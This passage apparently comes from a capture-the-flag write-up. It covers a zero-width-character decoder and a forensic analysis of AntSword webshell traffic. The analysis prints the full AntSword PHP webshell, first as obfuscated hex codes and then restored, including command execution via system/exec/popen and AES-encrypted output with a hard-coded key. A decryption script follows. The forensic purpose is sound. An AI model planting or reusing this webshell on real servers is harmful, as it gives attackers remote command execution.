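    return "".join("0" if ch == ZWNJ else "1" for ch in decoded if ch in (ZWNJ, ZWSP))


def bits_to_text(bits: str) -> str:
    if len(bits) % 8:
        raise ValueError(f"{len(bits)} bits is not a whole number of bytes")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)).decode("ascii")


def decode_zero_width(text: str) -> str:
    return bits_to_text(zero_width_to_bits(text))


def encode_zero_width(text: str, entities: bool = True) -> str:
    """Inverse mapping, used here only to build test input."""
    zero, one = ("&zwnj;", "&#8203;") if entities else (ZWNJ, ZWSP)
    bits = "".join(format(b, "08b") for b in text.encode("ascii"))
    return "".join(one if bit == "1" else zero for bit in bits)


# The 304-bit string recovered above, split into 40-bit chunks for readability.
PAGE_BITS = (
    "0110011001101100011000010110011101111011"
    "0110010100110010011000010011100101100011"
    "0011100001100010001100010011000100110111"
    "0011010101100101001101100011011001100011"
    "0110011000110010001100010110011000111000"
    "0011010100111001001100110110001001100011"
    "0011100000110101011000100110011000111001"
    "001100110011100101111101"
)

if __name__ == "__main__":
    print(bits_to_text(PAGE_BITS))
```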


webshell

The download is an AntSword webshell traffic capture.

The code is obfuscated as a list of character codes; save them and write a script to restore the text.

a=[0x40,0x69,0x6e,0x69,0x5f,0x73,0x65,0x74,0x28,0x22,0x64,0x69,0x73,0x70,0x6c,0x61,0x79,0x5f,0x65,0x72,0x72,0x6f,0x72,0x73,0x22,0x2c,0x20,0x22,0x30,0x22,0x29,0x3b,0x40,0x73,0x65,0x74,0x5f,0x74,0x69,0x6d,0x65,0x5f,0x6c,0x69,0x6d,0x69,0x74,0x28,0x30,0x29,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x61,0x73,0x65,0x6e,0x63,0x28,0x24,0x6f,0x75,0x74,0x29,0x7b,0x40,0x73,0x65,0x73,0x73,0x69,0x6f,0x6e,0x5f,0x73,0x74,0x61,0x72,0x74,0x28,0x29,0x3b,0x24,0x6b,0x65,0x79,0x3d,0x27,0x66,0x35,0x30,0x34,0x35,0x62,0x30,0x35,0x61,0x62,0x65,0x36,0x65,0x63,0x39,0x62,0x31,0x65,0x33,0x37,0x66,0x61,0x66,0x61,0x38,0x35,0x31,0x66,0x35,0x64,0x65,0x39,0x27,0x3b,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x40,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x65,0x6e,0x63,0x6f,0x64,0x65,0x28,0x6f,0x70,0x65,0x6e,0x73,0x73,0x6c,0x5f,0x65,0x6e,0x63,0x72,0x79,0x70,0x74,0x28,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x65,0x6e,0x63,0x6f,0x64,0x65,0x28,0x24,0x6f,0x75,0x74,0x29,0x2c,0x20,0x27,0x41,0x45,0x53,0x2d,0x31,0x32,0x38,0x2d,0x45,0x43,0x42,0x27,0x2c,0x20,0x24,0x6b,0x65,0x79,0x2c,0x20,0x4f,0x50,0x45,0x4e,0x53,0x53,0x4c,0x5f,0x52,0x41,0x57,0x5f,0x44,0x41,0x54,0x41,0x29,0x29,0x3b,0x7d,0x3b,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x61,0x73,0x6f,0x75,0x74,0x70,0x75,0x74,0x28,0x29,0x7b,0x24,0x6f,0x75,0x74,0x70,0x75,0x74,0x3d,0x6f,0x62,0x5f,0x67,0x65,0x74,0x5f,0x63,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x73,0x28,0x29,0x3b,0x6f,0x62,0x5f,0x65,0x6e,0x64,0x5f,0x63,0x6c,0x65,0x61,0x6e,0x28,0x29,0x3b,0x65,0x63,0x68,0x6f,0x20,0x22,0x38,0x63,0x32,0x62,0x34,0x22,0x3b,0x65,0x63,0x68,0x6f,0x20,0x40,0x61,0x73,0x65,0x6e,0x63,0x28,0x24,0x6f,0x75,0x74,0x70,0x75,0x74,0x29,0x3b,0x65,0x63,0x68,0x6f,0x20,0x22,0x65,0x32,0x65,0x31,0x30,0x22,0x3b,0x7d,0x6f,0x62,0x5f,0x73,0x74,0x61,0x72,0x74,0x28,0x29,0x3b,0x74,0x72,0x79,0x7b,0x24,0x70,0x3d,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x64,0x65,0x63,0x6f,0x64,0x65,0x28,0x24,0x5f,0x50,0x4f,0x53,0x54,0x5b,0x22,0x30,0x78,0x31,0x62,0x34,0x64,0x34,0x35,0x36,0x63,0x37,0x32,0x39,0x37,0x64,0x22,0x5d,0x29,0x3b,0x
24,0x73,0x3d,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x64,0x65,0x63,0x6f,0x64,0x65,0x28,0x24,0x5f,0x50,0x4f,0x53,0x54,0x5b,0x22,0x30,0x78,0x62,0x39,0x62,0x34,0x35,0x36,0x38,0x38,0x61,0x35,0x61,0x30,0x38,0x22,0x5d,0x29,0x3b,0x24,0x64,0x3d,0x64,0x69,0x72,0x6e,0x61,0x6d,0x65,0x28,0x24,0x5f,0x53,0x45,0x52,0x56,0x45,0x52,0x5b,0x22,0x53,0x43,0x52,0x49,0x50,0x54,0x5f,0x46,0x49,0x4c,0x45,0x4e,0x41,0x4d,0x45,0x22,0x5d,0x29,0x3b,0x24,0x63,0x3d,0x73,0x75,0x62,0x73,0x74,0x72,0x28,0x24,0x64,0x2c,0x30,0x2c,0x31,0x29,0x3d,0x3d,0x22,0x2f,0x22,0x3f,0x22,0x2d,0x63,0x20,0x5c,0x22,0x7b,0x24,0x73,0x7d,0x5c,0x22,0x22,0x3a,0x22,0x2f,0x63,0x20,0x5c,0x22,0x7b,0x24,0x73,0x7d,0x5c,0x22,0x22,0x3b,0x24,0x72,0x3d,0x22,0x7b,0x24,0x70,0x7d,0x20,0x7b,0x24,0x63,0x7d,0x22,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x66,0x65,0x28,0x24,0x66,0x29,0x7b,0x24,0x64,0x3d,0x65,0x78,0x70,0x6c,0x6f,0x64,0x65,0x28,0x22,0x2c,0x22,0x2c,0x40,0x69,0x6e,0x69,0x5f,0x67,0x65,0x74,0x28,0x22,0x64,0x69,0x73,0x61,0x62,0x6c,0x65,0x5f,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x73,0x22,0x29,0x29,0x3b,0x69,0x66,0x28,0x65,0x6d,0x70,0x74,0x79,0x28,0x24,0x64,0x29,0x29,0x7b,0x24,0x64,0x3d,0x61,0x72,0x72,0x61,0x79,0x28,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x7b,0x24,0x64,0x3d,0x61,0x72,0x72,0x61,0x79,0x5f,0x6d,0x61,0x70,0x28,0x27,0x74,0x72,0x69,0x6d,0x27,0x2c,0x61,0x72,0x72,0x61,0x79,0x5f,0x6d,0x61,0x70,0x28,0x27,0x73,0x74,0x72,0x74,0x6f,0x6c,0x6f,0x77,0x65,0x72,0x27,0x2c,0x24,0x64,0x29,0x29,0x3b,0x7d,0x72,0x65,0x74,0x75,0x72,0x6e,0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x5f,0x65,0x78,0x69,0x73,0x74,0x73,0x28,0x24,0x66,0x29,0x26,0x26,0x69,0x73,0x5f,0x63,0x61,0x6c,0x6c,0x61,0x62,0x6c,0x65,0x28,0x24,0x66,0x29,0x26,0x26,0x21,0x69,0x6e,0x5f,0x61,0x72,0x72,0x61,0x79,0x28,0x24,0x66,0x2c,0x24,0x64,0x29,0x29,0x3b,0x7d,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x72,0x75,0x6e,0x63,0x6d,0x64,0x28,0x24,0x63,0x29,0x7b,0x24,0x72,0x65,0x74,0x3d,0x30,0x3b,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x73,0x79,0x73,0x74,0x65,0x6d,0x27,0x29,0x29,0x
7b,0x40,0x73,0x79,0x73,0x74,0x65,0x6d,0x28,0x24,0x63,0x2c,0x24,0x72,0x65,0x74,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x70,0x61,0x73,0x73,0x74,0x68,0x72,0x75,0x27,0x29,0x29,0x7b,0x40,0x70,0x61,0x73,0x73,0x74,0x68,0x72,0x75,0x28,0x24,0x63,0x2c,0x24,0x72,0x65,0x74,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x73,0x68,0x65,0x6c,0x6c,0x5f,0x65,0x78,0x65,0x63,0x27,0x29,0x29,0x7b,0x70,0x72,0x69,0x6e,0x74,0x28,0x40,0x73,0x68,0x65,0x6c,0x6c,0x5f,0x65,0x78,0x65,0x63,0x28,0x24,0x63,0x29,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x65,0x78,0x65,0x63,0x27,0x29,0x29,0x7b,0x40,0x65,0x78,0x65,0x63,0x28,0x24,0x63,0x2c,0x24,0x6f,0x2c,0x24,0x72,0x65,0x74,0x29,0x3b,0x70,0x72,0x69,0x6e,0x74,0x28,0x6a,0x6f,0x69,0x6e,0x28,0x22,0xa,0x22,0x2c,0x24,0x6f,0x29,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x70,0x6f,0x70,0x65,0x6e,0x27,0x29,0x29,0x7b,0x24,0x66,0x70,0x3d,0x40,0x70,0x6f,0x70,0x65,0x6e,0x28,0x24,0x63,0x2c,0x27,0x72,0x27,0x29,0x3b,0x77,0x68,0x69,0x6c,0x65,0x28,0x21,0x40,0x66,0x65,0x6f,0x66,0x28,0x24,0x66,0x70,0x29,0x29,0x7b,0x70,0x72,0x69,0x6e,0x74,0x28,0x40,0x66,0x67,0x65,0x74,0x73,0x28,0x24,0x66,0x70,0x2c,0x20,0x32,0x30,0x34,0x38,0x29,0x29,0x3b,0x7d,0x40,0x70,0x63,0x6c,0x6f,0x73,0x65,0x28,0x24,0x66,0x70,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x61,0x6e,0x74,0x73,0x79,0x73,0x74,0x65,0x6d,0x27,0x29,0x29,0x7b,0x40,0x61,0x6e,0x74,0x73,0x79,0x73,0x74,0x65,0x6d,0x28,0x24,0x63,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x7b,0x24,0x72,0x65,0x74,0x20,0x3d,0x20,0x31,0x32,0x37,0x3b,0x7d,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x24,0x72,0x65,0x74,0x3b,0x7d,0x3b,0x24,0x72,0x65,0x74,0x3d,0x40,0x72,0x75,0x6e,0x63,0x6d,0x64,0x28,0x24,0x72,0x2e,0x22,0x20,0x32,0x3e,0x26,0x31,0x22,0x29,0x3b,0x70,0x72,0x69,0x6e,0x74,0x20,0x28,0x24,0x72,0x65,0x74,0x21,0x3d,0x30,0x29,0x3f,0x22,0x72,0x65,0x74,0x3d,0x7b,0x24,0x72,0x65,0x74,0x7d,0x22,0x3a,0x22,0x22,0x3b,0x3b,0x7d,0x63,0x61,0x74,0x6
3,0x68,0x28,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x20,0x24,0x65,0x29,0x7b,0x65,0x63,0x68,0x6f,0x20,0x22,0x45,0x52,0x52,0x4f,0x52,0x3a,0x2f,0x2f,0x22,0x2e,0x24,0x65,0x2d,0x3e,0x67,0x65,0x74,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x28,0x29,0x3b,0x7d,0x3b,0x61,0x73,0x6f,0x75,0x74,0x70,0x75,0x74,0x28,0x29,0x3b,0x64,0x69,0x65,0x28,0x29,0x3b]
for i in range(0,len(a)):
    print(chr(a[i]),end="")

The restored PHP:

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out)
{   @session_start();
    $key='f5045b05abe6ec9b1e37fafa851f5de9';
    return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
}
;
;
function asoutput()
{
    $output=ob_get_contents();
    ob_end_clean();
    echo "8c2b4";
    echo @asenc($output);
    echo "e2e10";
}
ob_start();
try{$p=base64_decode($_POST["0x1b4d456c7297d"]);
    $s=base64_decode($_POST["0xb9b45688a5a08"]);
    $d=dirname($_SERVER["SCRIPT_FILENAME"]);
    $c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";
function fe($f)
    {
        $d=explode(",",@ini_get("disable_functions"));
        if(empty($d)){$d=array();}
        else{$d=array_map('trim',array_map('strtolower',$d));}
        return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
    }
        ;
function runcmd($c)
{
    $ret=0;
    if(fe('system'))
    {@system($c,$ret);}
    elseif(fe('passthru'))
    {@passthru($c,$ret);}
    elseif(fe('shell_exec'))
    {print(@shell_exec($c));}
    elseif(fe('exec'))
    {@exec($c,$o,$ret);print(join("",$o));}
    elseif(fe('popen'))
    {
        $fp=@popen($c,'r');
        while(!@feof($fp))
        {print(@fgets($fp, 2048));}
        @pclose($fp);
    }
    elseif(fe('antsystem')){@antsystem($c);}
    else{$ret = 127;}
    return $ret;
};
    $ret=@runcmd($r." 2>&1");
    print ($ret!=0)?"ret={$ret}":"";;
}
catch(Exception $e){echo "ERROR://".$e->getMessage();}
;
asoutput();
die();

It's AES encryption; write a decryption function based on the source and the key:

<?php

// Placeholder: paste the response body captured from the traffic here
// (the captured value is not reproduced on this page).
$cipher = "PASTE_CAPTURED_RESPONSE_BODY_HERE";

// Mirror of asenc(): base64-decode, AES-128-ECB decrypt with the hard-coded key,
// then base64-decode the plaintext.
function decrypt($cipher) {
    $key = 'f5045b05abe6ec9b1e37fafa851f5de9';
    return @base64_decode(openssl_decrypt(base64_decode($cipher), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
}

// strip the 5-byte "8c2b4" prefix and "e2e10" suffix markers added by asoutput()
$cipher = substr($cipher, 5, strlen($cipher) - 10);
echo decrypt($cipher);

Extract the content from the traffic and decrypt it:

YmFiYWJhYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJi
YmIKaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGho
aGhoaGgKaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGho
aGhoaGhoaGgKZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dn
Z2dnZ2dnZ2dnZ2cKYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJi
YmJiYmJiYmJiYmJiYmIKbm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5u
bm5ubm5ubm5ubm5ubm5ubm4KZmxhZ3tBbnRTd29yZF9pc19Qb3dlcmZ1bF8zMjIyMjIyISEhIX0K
[S]
/var/www/html/tmp
[E]

Base64-decode it.